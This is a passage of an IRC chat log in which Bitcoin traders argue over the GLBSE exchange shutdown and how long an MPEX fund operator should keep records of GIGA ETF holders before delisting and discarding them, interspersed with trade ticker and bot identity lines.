weren't included in the list sent to issuer. Oct 31 02:39:42 hm Oct 31 02:40:01 but i mean... if not even half the shareholders are reinstated the thing is moot anyway Oct 31 02:40:09 might as well not have happened Oct 31 02:41:24 Yes, but if the contact information was not given, it's impossible to release that info to issuers anyway. But technically, that means Nefario would have released the full list if he could have done so, so theorically, it would be done. Oct 31 02:42:30 Let's say, if any of gigamining, asicminer or bitbond have together a total of at least 2 or more complaints from members with 50+ posts that they submitted their info but are not included in the released list, or the information for any of those 3 asset is not released at all by February 1st, it shall be deamed the information was not released. Oct 31 02:42:30 well so theoretically he's done it already >< Oct 31 02:42:59 ok, i guess i can go with that for 5 btc Oct 31 02:43:26 No, because he received the contact information from an unkown amount of persons but no issuers were forwarded that info. So even theorically, he has not released the data. Oct 31 02:44:29 im mostly curious to find what exact way does nefario find to both fuck up in some entirely unexpected novel way and also render this bet moot in one fell swoop Oct 31 02:45:49 [MPEX] [S.MPOE] 26700 @ 0.00045799 = 12.2283 BTC [-] Oct 31 02:46:49 [MPEX] [S.MPOE] 19867 @ 0.00045982 = 9.1352 BTC [+] Oct 31 02:46:50 [MPEX] [S.MPOE] 12000 @ 0.00046388 = 5.5666 BTC [+] Oct 31 02:46:52 [MPEX] [S.MPOE] 24733 @ 0.00046502 = 11.5013 BTC [+] Oct 31 02:46:53 [MPEX] [S.MPOE] 43400 @ 0.0004657 = 20.2114 BTC [+] Oct 31 02:50:16 He'll accidentally provoke a vacuum metastability event, resulting in a stabler state propagating throughout the Universe at the speed of light, defining new constants for the laws of physics, rendering all Earth and its matter... different. Oct 31 02:50:40 Rendering everything seen by humans pretty much meaningless. Oct 31 02:50:45 Including the bet. Oct 31 02:50:55 How does that sound? Oct 31 02:51:22 wat Oct 31 02:51:52 that sounds muchly exaggerated. Oct 31 02:52:40 Yes. It is. Oct 31 02:53:27 It's the most blown out of proportion screw up someone could do. Oct 31 02:53:56 i would guess he just mixes the shareholder tables Oct 31 02:54:02 sends company 1 list for company 2 Oct 31 02:54:30 eh, I'd consider that as information not released. Oct 31 02:54:58 As the correct issuer would not have the correct information. Oct 31 02:55:14 ya but he wouldn't know this Oct 31 02:55:48 and seeing how there's maybe a coupla dozen actual people with actual investments Oct 31 02:55:58 and they mostly held everything, being re Oct 31 02:56:29 That he knows matter not. Just that each issuer receives all the information Nefario was aware of, and that they have the correct information. Oct 31 02:56:32 being rearranged aroung might not even be noticed Oct 31 02:57:05 Since AML was not required and the majority probably claimed... Oct 31 02:57:32 I would doubt it would go unnoticed. Oct 31 02:57:41 The total amount of shares vary a lot. Oct 31 02:58:00 From one issue to the other. Oct 31 02:58:00 well ok then Oct 31 02:58:31 Plus some people would certainly they got shares of X instead of Y. Oct 31 02:58:40 Some might not complain... but many would. Oct 31 02:58:49 I'm sure the outcome will be very clear. Oct 31 03:00:04 oh, and dub Oct 31 03:00:07 http://en.wikipedia.org/wiki/False_vacuum Oct 31 03:00:41 Barack Obama will be re-elected as the president of USA Oct 31 03:00:41 955.94 347.20 Oct 31 03:00:54 Mitt Romney will be elected President of the USA Oct 31 03:00:54 80.90 227.78 Oct 31 03:01:05 ;;calc 227.78 / 80.9 Oct 31 03:01:06 2.81557478368 Oct 31 03:01:13 ;;calc 955.94/347.20 Oct 31 03:01:13 2.75328341014 Oct 31 03:05:33 But really, what bothers me is not the delisting (and trading stopping, which would be appropriate), but the complete deletion of data. The ETF has no terms reserving yourself the right to arbitrarily void the obligation. Oct 31 03:06:48 I would expect the obligation to be honored, wether the assets resurface in 1 day or 2 years. Oct 31 03:07:36 Keeping the data aside doesn't cost much logistically. Oct 31 03:07:53 well, it is kept aside if you keep your stats. Oct 31 03:08:14 mpex isn't designed to be a sort of glbse Oct 31 03:10:22 Hmm, but the data does exist. Wouldn't a simple backup of the tables containing the data for the ETF be enough? Oct 31 03:10:36 enough for what tho ? Oct 31 03:11:19 To reinstate it should it become possible. Oct 31 03:12:21 [MPEX] [S.MPOE] 24400 @ 0.00046534 = 11.3543 BTC [-] Oct 31 03:12:37 nah, if it doesn't come to its senses by dec 1st it's not getting reinstated. Oct 31 03:12:53 some direct thing, maybe, but glbse shares, no. Oct 31 03:13:27 That's the thing, they would be direct shares with Gigamining should the information be released. Oct 31 03:13:42 not GLBSE shares Oct 31 03:14:12 basically, the reasoning is this : there was a company organised to finance a ship sent to wherever. Oct 31 03:14:15 that ship was lost at sea Oct 31 03:14:25 if it's not heard from in X time, the company is dissolved as worthless. Oct 31 03:14:47 Gigavps keeps track of all payments due and if information is released, will pay all what is due. Oct 31 03:15:09 The "company" is neither lost, or getting dissolved. Oct 31 03:15:31 the etf held glbse shares. Oct 31 03:15:35 that's the ship. Oct 31 03:15:47 sure, the concept of spices, or the concept of cargo, or the ship's destination still exists. Oct 31 03:16:01 but the ship itself is lost at sea. Oct 31 03:16:36 The ship's location is known. Who the cargo is to be delivered to is not known. Oct 31 03:16:51 GLBSE simply either hasn't released who had how many shares. Oct 31 03:17:06 but glbse.com is no longer responding, is it. Oct 31 03:17:50 Nefario still talked to a few people recently. But doesn't answer publicly or to support requests. Oct 31 03:18:03 not what i said tho. Oct 31 03:18:17 glbse.com is no longer responding, the website itself. Oct 31 03:18:20 Probably because they consist on thousands upon thousands of tickets looking like: "I haven't received my balance yet. Why?" Oct 31 03:18:29 Ah, GLBSE.com Oct 31 03:18:37 yes. so no, the ship's location is not known. Oct 31 03:18:40 it USED to be known. Oct 31 03:18:53 and back when it still was known, we were still waiting. Oct 31 03:19:12 I don't see how GLBSE is the ship. The ship is Gigavps's mining operation. Oct 31 03:19:48 well that's an incorrect representation. obviously it may be convenient, but it's not the case. Oct 31 03:19:55 the etf held glbse shares, nothing else. Oct 31 03:20:13 Your IPO technically states: "The owner of this ETF holds 900 perpetual 5.0Mh/s bonds (details), " Oct 31 03:20:30 Not GLBSE shares, GIGAMINING mining bonds. Oct 31 03:20:47 the ship is sailing in milk. Oct 31 03:20:58 there's sufficient reference to "owning shares" to satisfy this point. Oct 31 03:21:27 lol kakobrekla Oct 31 03:23:06 The shares were traded on GLBSE. But GLBSE was never the ship. It never mined or produced the returns. It was merely sending the ship where it was to be delivered. Now the ship doesn't know where to go. Oct 31 03:23:50 The shares were traded on GLBSE. But GLBSE was never the ship. << what's this, cognitive dissonance 101 ? Oct 31 03:24:37 Because GLBSE was never the shares or represented them, they were merely a platform to exchange the bonds. Oct 31 03:24:48 this is not true. Oct 31 03:24:54 this is true of mpex, yes, because mpex is correctly designed Oct 31 03:25:02 not the case of glbse however. Oct 31 03:25:19 with glbse, nefario == glbse == the shares. there's no way to actually make these distinctions you'd like Oct 31 03:25:29 sure, they're desperately needed, but unfortunately did not exist. Oct 31 03:26:16 I think Pirates like Goats Milk. Oct 31 03:31:35 What you're saying sounds like if my broker, after the NYSE let's say is hit by a meteor and trading is halted, coming to me to say he has no news of when it will come back and that holders data might or might not be lost, possibly never to come back and says "You have to let go." (said in a very comforting voice, patting you on the shoulder, with a grin on his face), because obviously Oct 31 03:31:35 the traded company and their stock don't exist without the stock exchange. So he'll delete all his records of which stocks that he held in my name because he consider the ship lost at see. And if data comes back: "Oh sorry. Can't give you anything, I don't have records showing what I owe you." Oct 31 03:32:28 why does it sound like that ? Oct 31 03:34:01 Because that's exactly what you're doing? Except the moment where you tell me I have to let go. Oct 31 03:34:56 It's not like someone lost at see who is declared as such because he can't survive too long in the open sea so all efforts should be abandoned. Shares can't die, even if lost for years. Oct 31 03:34:59 but you are familiar with the circumstance that the nyse merely trades, there's clearing houses and depositary isntitutions which actually hold the shares and settle/clear the transactions Oct 31 03:35:00 correct ? Oct 31 03:37:28 well ?! Oct 31 03:37:53 Yes, and it should have been done. The fact GLBSE was 100% central seems moot however. Because the fact the data might not resurface and the broker might not get access to the shares he held for me does not excuse him to erase all data just for the heck of it based on his personal expectations of what will happen. I would expect the same from someone managing an ETF. Oct 31 03:37:57 [MPEX] [S.MPOE] 15000 @ 0.00046534 = 6.9801 BTC [-] Oct 31 03:37:58 [MPEX] [S.MPOE] 2300 @ 0.00046531 = 1.0702 BTC [-] Oct 31 03:38:20 Especially with something as easy to avoid by simply not willingly deleting the data. Oct 31 03:38:34 so, to fix your example : if a rain of meteors obliterates the nyse, and each and all scrap of trace of the existance, chain of custody and so forth of an asset Oct 31 03:38:47 will you be surprised if your broker says, after a few years/a decade, "sorry" and moves on ? Oct 31 03:39:09 After a decade, no. Oct 31 03:39:14 right. Oct 31 03:39:18 it's been 8 dividend periods. Oct 31 03:39:22 that's close to a decade. Oct 31 03:39:45 It hasn't been a decade however. Oct 31 03:39:57 but this isn't an irl broker, however. Oct 31 03:40:09 time moves at a different pace here, as proven by the fact dividends are not paid yearly. Oct 31 03:41:05 If no trace are found of records and it's obvious they were destroyed, I would not mind that my broker moves on and asks the same of me. But this is not the case. Oct 31 03:41:20 Time does not move at a different pace? Oct 31 03:41:22 now, i haven't DONE THIS FIRST, but announced it with ample time in advance exactly so as to have the opportunity for this sort of conversation Oct 31 03:42:50 Dividends are paid more often simply because Bitcoins (and bitcoin mining) allows income and sharing of it much faster without all the financial fees to send those funds around. Not because time magically paces faster around Bitcoins. Oct 31 03:43:13 again, cognitive dissonance 101 ? Oct 31 03:43:20 things happen faster but they don't happen faster ? Oct 31 03:43:23 well, why not ? Oct 31 03:44:01 The dividends happen faster. Time does not move faster. They are different things. Oct 31 03:44:20 your irl broker will move on after 10 dividend periods, aka a decade irl. mpex moves on after 10 dividend periods, aka 2 months irl. Oct 31 03:44:23 seems rather reasonable. Oct 31 03:45:24 I would attribute the frequent dividend to the nature of Bitcoins. They allow it for not being as slow and not requiring such wire fees for sending funds. Plus the small nature of operations can also manage to pay more often. Oct 31 03:45:41 right. Oct 31 03:45:56 but the asset has in fact already missed something like 5 or 6 dividend payments, correct ? Oct 31 03:46:13 The time my IRL broker moves on is not based on dividend periods, it's based on leaving time for the recovery of record. That dividends are paid every day or every 10 years matters not. Oct 31 03:46:33 well, why not ? Oct 31 03:47:07 if "allows income and sharing of it much faster" that'd seem on the face that it... allows... things...moving...faster. Oct 31 03:47:22 why should just some things move faster ? Oct 31 03:47:29 Because why would he wait before moving on? For data recovery if possible. If not possible, move on. Oct 31 03:47:38 right. Oct 31 03:47:58 so you are literally telling me that it takes two months to do a couple sql queries on nefario's end ? Oct 31 03:48:22 Data recovery is completly unrelated and independant of payment periods. Oct 31 03:48:32 it's not like he has to dig out records from a 5mn folders pile of paper. Oct 31 03:48:38 no, it's not lol Oct 31 03:48:54 since the very reason you gave for faster payment periods was ease of handling the data Oct 31 03:50:08 Well who's to say because it is easy and faster, it will be done so? You could pay out on S.MPOE daily or weekly, but you do not. Oct 31 03:50:28 no, i do not. i think the weekly thing is unconscionable. Oct 31 03:50:35 but that's really besides the point isn't it ? Oct 31 03:50:56 Not really. Oct 31 03:51:19 how so ? Oct 31 03:53:22 I claim payment period can possibly be more frequent, but not obligated. I want to know why, because of these faster periods (completly unrelated and optional), you feel it's ok to move on and delete all data just as much faster, without any knowledge of what's happening on Nefario's side? Oct 31 03:54:12 but do you actually claim that objectively the time needed to retrieve the data is in the months rather than minutes scale ? Oct 31 03:54:23 No Oct 31 03:54:31 ok. so then what is your idea here ? Oct 31 03:54:47 that more time could conceivably helpand thus is a right ? Oct 31 03:55:16 nefario could in fact have released all the data in question in half the time we took discussing his idiocy so far. Oct 31 03:55:19 just in this present bout. Oct 31 03:55:26 But he seemed quite concerned of the legalities when he closed. He didn't run away with all the funds. He did take time to start processing. He's probably still concerned. Oct 31 03:55:53 so ?! Oct 31 03:56:25 So he could be checking further how to minimize his liabilities. Oct 31 03:56:50 after the fact ? Oct 31 03:56:51 Decide to require AML again for disclosing assets, or anything really. Oct 31 03:57:00 Yes, after the fact. Oct 31 03:57:29 i still don't see how any of this makes any sense or amounts to an actual challenge Oct 31 03:57:48 i mean... maybe he decides to give us all candy, in the future. it's possible, why not. Oct 31 03:58:00 but that aside : a catastrophe has occured Oct 31 03:58:19 even though this was not specifically written out in thecontract, a set interval of time will be allowed for recovery Oct 31 03:58:25 after which that's that. Oct 31 03:58:31 do you see a problem in principle with this ? Oct 31 03:59:30 If you don't know the facts, he claims to have asked the FSA about it long ago but they claimed not to be concerned by anything Bitcoins related. (Probably miscommunication). Trying to go legal, he consulted again and was told to stop or he could be charged. Oct 31 03:59:47 you know this as a fact ? Oct 31 04:00:20 I'll have to fetch the sources, but it seems likely. Seems to be what GLBSE shareholders claim. Oct 31 04:00:28 well does it seem likely or wtf. Oct 31 04:00:39 half the glbse shareholders are pretty much lieing scumbags, as it came out. Oct 31 04:00:57 i thought you were all against mixing fact and fiction. Oct 31 04:02:06 Hmm, yes. But fact is, if it's indeed true, he could limit his liabilities by applying regulations after he's been made aware of it, and would certainly get him to delay things a lot while consulting. Oct 31 04:02:34 mircea_popescu: the glbse flaming and whatnot... don't you have ties to a competing exchange? as such, isn' Oct 31 04:02:35 look, i have in fact hired lawyers in this life, i'm not talking out of imagination. Oct 31 04:02:42 NEVER have i waited A MONTH for a fucking report. Oct 31 04:02:45 isn't FUD surrounding GLBSE good for your business? Oct 31 04:02:55 maybe a couple of weeks, if it was REALLY involved and complex and needed loads of research Oct 31 04:03:05 [MPEX] [S.MPOE] 1131 @ 0.00046045 = 0.5208 BTC [-] Oct 31 04:03:05 [MPEX] [S.MPOE] 27700 @ 0.00046037 = 12.7522 BTC [-] Oct 31 04:03:08 I'm against opinion passing as facts, or misquoting. Oct 31 04:03:09 kuzetsa i own the exchange glbse was trying to compete with. Oct 31 04:03:27 uh huh Oct 31 04:03:31 But Nefario seems to only be able to aford some lousy lawyer. Oct 31 04:03:48 BTC-Mining ok, but let's get back on track here. Oct 31 04:04:24 If Nefario is screwing things up or being slow, it wouldn't excuse you from doing just as much in return. Plus it opens you to accusations. You should keep the data for at least more than 2 months is what I am saying. Oct 31 04:05:02 well so i said it's kept a month, you want it to be kept two. am i correct in inferring that at least in principle you don't see a problem, and you mostly dispute the actual time interval ? Oct 31 04:05:50 No, after the 1st December, you'll have kept it for more than 2 months. Oct 31 04:06:02 huh ? Oct 31 04:06:15 hmm... 2 months actually Oct 31 04:06:26 Since the day GLBSE went down. Oct 31 04:06:48 how do we count that ? was it oct 1st ? or with goat ? or with yest when it finally went offline ? Oct 31 04:08:00 And yes, I dispute the time interval. Your argument so far was that if payment periods go faster, why not the time allowed to disclose the information before considering it gone for good? But you yourself agreed that the two were unrelated. Oct 31 04:08:16 I do not dispute the delisting, nor the need to eventually move on. Oct 31 04:08:24 so for clarity, you agree with the principle, but disagree with the interval ? Oct 31 04:08:27 kay. Oct 31 04:08:35 well... so what's the rationale for your interval ? Oct 31 04:09:19 > mircea_popescu wonders if everyone else is alseep/sexting/busy not giving a shit or quite the contrary, Oct 31 04:09:34 o hai sgornick Oct 31 04:09:48 how much is it ? Oct 31 04:09:56 about two satoshis. Oct 31 04:10:04 address ? :p Oct 31 04:10:18 hey, thats my fee. Oct 31 04:10:22 8/60th of minimum salary in whatever area he is located. Oct 31 04:10:31 minimum hourly salary* Oct 31 04:10:38 ;;gpg info sgornick Oct 31 04:10:38 User 'sgornick', with keyid F64A32C07327B2F8, fingerprint 1619E0F30A0AE945C3A5407EF64A32C07327B2F8, and bitcoin address 1ADZYhYZu1epmsZUAUa2fZ299p7xwVJ46k, registered on Mon Mar 7 00:42:20 2011. http://bitcoin-otc.com/viewgpg.php?nick=sgornick . Currently not authenticated. Oct 31 04:10:47 mircea_popescu: probably that one :P Oct 31 04:11:11 maybe he wants satoshi pairs sent to special mating addresses where they can multiply, what do i know. Oct 31 04:11:21 heh Oct 31 04:12:29 BTC-Mining: "... He didn't run away with all the funds. ..." << um actually you can't quite say this, only 2 of my 3 accounts received btc back Oct 31 04:12:57 He didn't run away with >>ALL<< the funds Oct 31 04:13:17 heh, he did from the perspective of those accounts Oct 31 04:13:32 and i put that backward Oct 31 04:13:38 1 of 3 got btc back Oct 31 04:13:39 smickles in the end it seems he paid ~1.3k or so Oct 31 04:13:49 So you could expect he actually intends to refund everyone. Wether he can or screw up doing so however, is uncertain, since there's already a screw up. Oct 31 04:13:50 originally i was thinking he just paid theymos' funds Oct 31 04:14:15 BTC-Mining i still don't understand why would he not have issued the assets, if he's gonna do it. Oct 31 04:14:25 i mean, at first few days cause it might take some time to recombobulate the data Oct 31 04:14:33 then cause he was holding theymos hostage for btc Oct 31 04:14:34 now ? Oct 31 04:14:35 mircea, 1.3k is just what was claimed by people on the forum. Most probably never claimed their payment on my thread, or were even aware of it or willing to disclose how much they had on it. Oct 31 04:14:41 is there news about the asset info? Oct 31 04:14:45 smickles none Oct 31 04:14:55 People like to be private around Bitcoins it seems. Oct 31 04:15:04 Mircea, the rationale behind the interval is that with how things have been going, it is not clear or obvious that Nefario lost any data or intends not to return it. And being highly unpredictable and uncommunicative since the start, one could expect the information to be released way past the short delay you seem to allow. Oct 31 04:15:05 what am I going to do with all this btc if i don't get infos Oct 31 04:15:06 this is mostly cause i announced that giga.etf goes away on dec 1st if it's not fixed Oct 31 04:15:28 BTC-Mining yes, but in order to have a deadline you have to have a deadline Oct 31 04:15:38 But why one month away? Oct 31 04:15:40 so what's your proposed deadline and why ? Oct 31 04:15:46 well, i honestly went 10x dividend periods Oct 31 04:15:54 seemed to me the most reasonable approach. Oct 31 04:16:16 yeah, what's the reasonable amount of time that I have to secure and maintain this btc? Oct 31 04:16:25 it's not like i'm getting paid to do it Oct 31 04:16:29 smickles it's a quite important problem. Oct 31 04:16:36 which is why i think this discussion matters. Oct 31 04:16:53 i mean, FOREVER is off the table. now, how long is reasonable ? Oct 31 04:17:01 Wait, did the giga.ETF manager obtain the gigamining shares through GLBSE, or direct from gigamiing? Oct 31 04:17:03 is there any legal position to be informed by? Oct 31 04:17:08 smickles not really. Oct 31 04:17:25 sgornick i originally had them directly, but then all pre-ipo holdings were transformed into glbse shares Oct 31 04:17:42 I'd say at least 6 months without any news or sight whatsoever of Nefario. Considering it's assets information, it's still very short, but at least more appropriate. Oct 31 04:17:46 bad move, in hind sight mircea_popescu Oct 31 04:18:05 smickles i didn't want to do it, i asked at the time to keep it private, but eventually didn't want to cause trouble. Oct 31 04:18:10 6 months and then what BTC-Mining ? Oct 31 04:18:11 after all, "fud" it was called, right ? Oct 31 04:18:32 fud, lovely Oct 31 04:18:36 He'll delete all data regarding what is owed. Oct 31 04:18:39 6 months "without sight" ? what if the bloke pulls a strateman, drops by every season on btctalk to post a trollface ? Oct 31 04:18:54 thing is, Uncertainty and Doubt are good things Oct 31 04:18:58 BTC-Mining i can't delete "all data" man. the signed stats will forever exist. Oct 31 04:19:08 Aye Oct 31 04:19:13 we're not talking glbse here. Oct 31 04:19:31 anyone can keep the stat saying "x F.GIGA" for as long as they think it's worth it. Oct 31 04:19:44 But you won't keep your side of the data or honor anything, am I right? Oct 31 04:19:51 or will you? Oct 31 04:20:01 it won't show in your stats anymore. Oct 31 04:20:25 it will still exist in my backups, obviouysly Oct 31 04:20:37 (as well as in your backups, if you're downloading the mpex backups with any frequency) Oct 31 04:20:50 So you're actually going to keep the data? Oct 31 04:20:58 depends what that means ;/ Oct 31 04:21:13 it will not be in the active db. Oct 31 04:21:54 Will you honor the most recent data available as of who owns what of the ETF should the information be disclosed and you get access to the funds received through it? Oct 31 04:22:04 I guess would be were I'm getting at. Oct 31 04:22:24 30 years later? Oct 31 04:22:26 lol srsly. Oct 31 04:22:27 ;P Oct 31 04:22:39 Yes. Oct 31 04:22:42 nope. Oct 31 04:23:01 BTC-Mining: you expect the data to be kept for 30 years? Oct 31 04:23:10 didn't you just say above you understand there will have to be some limit ?! Oct 31 04:23:51 I wasn't answering to smickles... in hindsight, I was answering the "lol, srsly", but it was probably destined to smickles. Oct 31 04:24:24 http://usgovinfo.about.com/od/moneymatters/a/unclaimedabout.htm Oct 31 04:24:35 no but in general, people will have to start reading up on write-offs. Oct 31 04:24:45 I don't expect 30 years. I'm just asking, suppose the data is released in the next few months, would you honor the most recent information? Oct 31 04:24:45 this notion that they hang on the hope of pirate repaying 30 years later... Oct 31 04:24:49 this is cargo cult not finance. Oct 31 04:25:02 if those next few months are november, then absolutely. Oct 31 04:25:25 But pirate was an obvious ponzi, still is, and he just disappeared suddenly one day and stopped paying people. Oct 31 04:25:31 no he didn't Oct 31 04:25:37 he kept pulling people's chains FOR MONTHS Oct 31 04:26:00 and it was "an obvious ponzi" pretty much to three people iirc. Oct 31 04:26:06 but we digress Oct 31 04:26:32 Sorry. The business stopped paying suddenly one day. Oct 31 04:26:35 http://files.abovetopsecret.com/files/img/nq508ed4f8.jpg this is aptly named "ocean city" Oct 31 04:27:39 All I'm saying is, 1 month is not reasonable delays. Oct 31 04:27:45 2. Oct 31 04:27:57 smickles: ;;ident Oct 31 04:28:22 1 month before delisting, 6 before deleting the data you hold, would be the minimum I find acceptable. Oct 31 04:28:26 ;;ident Oct 31 04:28:27 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Oct 31 04:28:29 ;;ident thestringpuller Oct 31 04:28:30 Nick 'thestringpuller', with hostmask 'thestringpuller!~leflor@99-39-98-185.lightspeed.tukrga.sbcglobal.net', is identified as user thestringpuller, with GPG key id 0FF2943DA179E169, key fingerprint 6ACE36E786F39A4ADC4506DE0FF2943DA179E169, and bitcoin address None Oct 31 04:28:32 [MPEX] [S.MPOE] 8769 @ 0.00045982 = 4.0322 BTC [-] Oct 31 04:28:33 [MPEX] [S.MPOE] 300 @ 0.00046489 = 0.1395 BTC [+] Oct 31 04:28:34 BTC-Mining based on what criteria ? Oct 31 04:28:35 [MPEX] [S.MPOE] 5400 @ 0.0004657 = 2.5148 BTC [+] Oct 31 04:28:35 [MPEX] [S.MPOE] 11631 @ 0.00046613 = 5.4216 BTC [+] Oct 31 04:28:41 just pulled some numbers ? Oct 31 04:30:33 Yes it's an opinion. Based on the fact Nefario has been unreliable and he doesn't have an history of completing task this fast. So I find it unreasonable to give a delay of 1 month. Oct 31 04:31:23 man, but this subject can'tbe decided based on nefario. nefario is below a negligible quantity. Oct 31 04:31:29 we need something workable in principle Oct 31 04:31:43 you think we'll just change the terms based on each low-life that happens to blow this way ? Oct 31 04:32:06 But there's none, because only Nefario can release the data. And he's unreliable. Oct 31 04:32:22 I'm not going to base my obligation on the shortcomming of an asshat Oct 31 04:32:31 Even if you're not at fault, professionalism would recommend you allow a long delay to account for that. Oct 31 04:32:40 smickles in any event, i don't think escheat would be the controlling doctrine. more like treasure trove or somesuch Oct 31 04:33:06 BTC-Mining: from what i'm reading, it seems that a resonable period of time may be between 1 and 3 years Oct 31 04:33:07 BTC-Mining i don't dispute, a long delay. why's 2 months not a long delay tho. Oct 31 04:35:38 mircea_popescu: what about considering it lost Oct 31 04:35:47 Because any individual, especially when dealing with them personnally, can often report to later for months to a few years before resolving the dispute or admitting he can't. And Nefario admitted he wouldn't accept any decision by GLBSE shareholder and would act however he wished to protect himself. Oct 31 04:36:19 smickles needs more words Oct 31 04:36:23 He made it obvious he would have priority, so long delays might be expected. Oct 31 04:36:46 you keep refering to nefario as if he's relevant. i don't see why he is relevant at all. Oct 31 04:37:11 If he had never sent out so many payment and just stopped business like Pirate did and just stayed around, I would not have minded the 1 month delay. Oct 31 04:37:46 I already stated he's relevant because he's the only one holding the assets information and able to disclose it. Oct 31 04:38:38 but the only way to quash this would be to show that a two month delay is not acceptable in principle. Oct 31 04:38:43 http://en.wikipedia.org/wiki/Adverse_possession would be an interesting way to handle it Oct 31 04:38:47 showing that it's not convenient in this particular case isn't much. Oct 31 04:39:16 smickles afaik that's always been limited to real property. Oct 31 04:39:21 yeah Oct 31 04:39:28 there's no adverse posession of chattels Oct 31 04:39:54 Delays for data recovery can never be determined exactly. I don't see why it would require to be proven to be acceptable or not. Oct 31 04:40:10 i mean, BTC-Mining : i received recently a request from neustar to prove that indeed i am entitled to hold a .us domain Oct 31 04:40:15 the time interval offered was 10 days. Oct 31 04:40:56 Yes, so? Oct 31 04:41:19 oh shit Oct 31 04:41:24 involuntary bailee Oct 31 04:41:26 An exception to all the above is the case of an involuntary bailee, one who by not intentional acts is made a bailee. For example, if one is given a stock certificate but it turns out to be the wrong certificate (intended for someone else), he is an unintentional bailee, he has made no intentional act to become a bailee. He is therefore entitled to divest himself of the certificate regardless of a duty of care, so long as he does no malicious or Oct 31 04:41:44 smickles ofcourse. but we're trying to avoid this. Oct 31 04:41:58 there's no dispute that in law i can drop the entire thing on oct the 5th. Oct 31 04:42:04 you too, and anyone else involved. Oct 31 04:42:15 Why? Oct 31 04:42:32 And does that automatically make that delay appropriate for everything? (the 10 days thing) Oct 31 04:42:32 BTC-Mining: seems to be statutory in common law Oct 31 04:42:34 BTC-Mining because you can't force somebody to hold something for you at their expense ? Oct 31 04:42:39 with no precedent overriding it Oct 31 04:43:35 But that's the thing, you were not forced to held these for us and would gain a huge financial benefit if the information is disclosed after you deleted the data. Oct 31 04:43:46 what benefit is that ? Oct 31 04:43:56 You're not an unintentional bailee. Oct 31 04:44:41 Financial benefit? You are now in possession of ~1000 Gigamining bonds with no data of who held the ETF or intention to honor it. Oct 31 04:44:51 nope ? Oct 31 04:45:08 How so? Oct 31 04:45:22 i have (indirect) claims on about 1k (more like 1.1 iirc) of gigaminign shares. Oct 31 04:46:03 Aye, so? Oct 31 04:46:20 if i had 1k bonds this discussion wouldn't exist, i'd be paying dividends on them lol. Oct 31 04:46:45 You don't have them now, no... That's not what I said either. Oct 31 04:47:11 You are now in possession of ~1000 Gigamining bonds << Oct 31 04:47:17 but anyway. Oct 31 04:47:32 I said if information was released after December 1st, you'd now be in possession of those bonds. Oct 31 04:47:43 o i see Oct 31 04:48:22 Because you would have deleted all data with no intent to further honor it, it stands as a financial gain. Gigavps keeps track of what is due and would start paying out all missed payments. Oct 31 04:48:32 nah, im not going to realise that gain. Oct 31 04:48:51 No, but that won't be verifiable. Oct 31 04:51:06 not forced to hold? i giving it all back and nefario stopped that and sent the btc back to me :/ Oct 31 04:52:04 i guess if i end up with a windfall it'll just make some worthy cause rich. Oct 31 04:52:23 i wonder who should get it this time, pdpc got it last time... Oct 31 04:52:54 And since you were not forced to hold them for the ETF, I think that voids your right to be entitled to divest yourself of the certificate either. Oct 31 04:53:14 huh ? Oct 31 04:53:43 What smickles proposed about involuntary bailee. Oct 31 04:54:32 wait a second. Oct 31 04:54:33 i dunno that much about involuntary bailee, i'm just searching for any sort of similar thing to what's going on here Oct 31 04:54:59 so, i made thing A. thing A is no longer. you want me to be the holder of substitute-thing B until such a time that you're satisfied. Oct 31 04:55:04 this qualifies just fine. Oct 31 04:55:22 [MPEX] [S.MPOE] 4800 @ 0.00045984 = 2.2072 BTC [-] Oct 31 04:55:24 [MPEX] [S.MPOE] 2600 @ 0.00045901 = 1.1934 BTC [-] Oct 31 04:55:26 [MPEX] [S.MPOE] 11300 @ 0.00045833 = 5.1791 BTC [-] Oct 31 04:55:27 [MPEX] [S.MPOE] 16757 @ 0.00045799 = 7.6745 BTC [-] Oct 31 04:55:29 [MPEX] [S.MPOE] 12368 @ 0.00045794 = 5.6638 BTC [-] Oct 31 04:59:34 You're not even divesting from the Gigamining shares, you're destroying your own ETF, issued by you. Divesting requires departing yourself of the asset. But if information is disclosed, you will be in their possession. What you are destroying are the claims to them, which you are: Oct 31 04:59:36 1. Neither the holder Oct 31 04:59:47 2. Neither the involuntary holder Oct 31 05:00:16 You own rights to Gigamining bonds (on your own will). I own claims to them. Oct 31 05:00:49 let's see the whole line here. Oct 31 05:00:58 BTC-Mining: involuntary bailee seems to say that if someone is in possesion of something that isn't theirs, and they came by this possesion unintintionally, then they are not responsible to the real owner for what happens to it Oct 31 05:01:28 1. giga made a mining thing ; 2. glbse listed the mining thing ; 3. i own shares in the glbse mining thing ; 4 i made a mpex thing ; 5 you own shares in the mpex thing. Oct 31 05:01:39 this about right so far ? Oct 31 05:02:01 He didn't get the shares unintentionally. He bought them to then sell fractional claims to them. Oct 31 05:02:19 so the shares are his anyway then Oct 31 05:02:34 the fractional claim is the question? Oct 31 05:02:46 He's not an unintentional holder is what I'm saying. Oct 31 05:02:50 it's force majeure Oct 31 05:03:10 overwhelming force has voided the f.giga contract Oct 31 05:03:24 voided or posponed i guess Oct 31 05:03:40 No Oct 31 05:04:12 how is it not? Oct 31 05:04:20 no but srsly, let us get to the bottom of this, ok ? Oct 31 05:04:29 He has no such clauses or anything reserving himself the right to arbitrarily and unilaterally void the claims he sold himself. Oct 31 05:04:30 BTC-Mining you dispute the scheme laid out above ? Oct 31 05:04:40 I do not. Oct 31 05:04:45 ok. Oct 31 05:04:53 now, in the event 2 dissapears, Oct 31 05:05:00 Except for part 3 Oct 31 05:05:06 well ? Oct 31 05:05:18 You own shares in the mining thing, not the glbse mining thing. Oct 31 05:05:32 nope, i own shares in the glbse miningthing Oct 31 05:05:39 ie, GIGAMINING shares Oct 31 05:06:08 You own Gigamining shares, issued and traded on GLBSE, but not "GLBSE's mining thing" Oct 31 05:06:13 again, if i had off-glbse private bonds this entire discussion would be moot. Oct 31 05:06:24 Indeed... Oct 31 05:06:29 well, let it be on record that what i mean by "GLBSE's mining thing" is Gigamining shares, issued and traded on GLBSE Oct 31 05:06:36 moving right along. Oct 31 05:06:39 Perfect then Oct 31 05:06:54 once 2 goes away, you propose that it is my obligation to create a 2' vehicle to bridge this gap. Oct 31 05:07:05 i might extend something like this as a courtesy, and for a limited time Oct 31 05:07:37 in law i'm perfectly allowed to not do it at all (hence the discussion of involuntary bailee, you purport to make me the depositor of a 2' device which i never should have to hold) Oct 31 05:08:01 but even if i forfeit this entitlement, i can only do 